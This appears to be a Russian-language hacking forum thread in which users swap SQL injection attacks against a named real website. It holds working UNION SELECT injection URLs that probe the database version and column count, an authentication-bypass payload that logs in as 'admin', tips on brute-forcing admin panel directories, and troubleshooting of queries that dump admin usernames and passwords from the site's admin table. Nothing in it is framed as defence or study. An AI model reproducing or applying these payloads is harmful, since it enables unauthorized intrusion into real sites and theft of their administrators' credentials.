http://www.hard-ekt.ru/index.php?section=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--
F4R Может пора заканчивать с такими вопросами? В чём у тебя возникли сложности? Или тебе просто лень? Там всё элементарно, а это уже наверное 10 твой такой вопрос, неужели так трудно подбирать колонки? Прочитай одну любую статью по скулям
дак я читал... просто непонятно вы что в ручную всё подбраете или тупо линк кинули в прогу и она сама подобрала?
http://www.hard-ekt.ru/index.php?section=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* читай внимательнее!!!
а какие есть способы нахождения админки кроме тупого подбора? http://www.hard-ekt.ru/ где например она находится здесь?
Всегда как минимум смотри исходники страницы, увидел Joomla, Wordpress и тому подобное - делаешь выводы, где админка. Или слушаешь совет выше, или пишешь свой брутер на диры (не так сложно, кстати) ЗЫЖ за исключением наличия полей ввода логина-пароля прямо на главной странице, конечно
А как реализовывается обход авторизации к примеру в данном случае SELECT * FROM adminpanel WHERE pass = ' ' ?
если уязвимо поле pass то в это поле пишем Code: 12345' OR login='admin'; -- запрос станет таким Code: SELECT * FROM adminpanel WHERE (login='admin' AND pass='12345') OR (login='admin'); авторизация будет успешна пройдена под логином admin
Всем привет. Подскажите, нипАнятна. пытаюсь вывести данные из колонки admin: =-345+union+select+1,2,concat_ws(0x3a,admin_user,admin_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin-- Ничего не выводит. Пробую лимит, тоже самое. Хэксил - пусто. Пишу: =-345+union+select+1,2,count(*),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin-- Выводит число 149 Чиво делаю не правильно?
Попробуй без concat'а. Code: -345+union+select+1,2,admin_password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+admin--
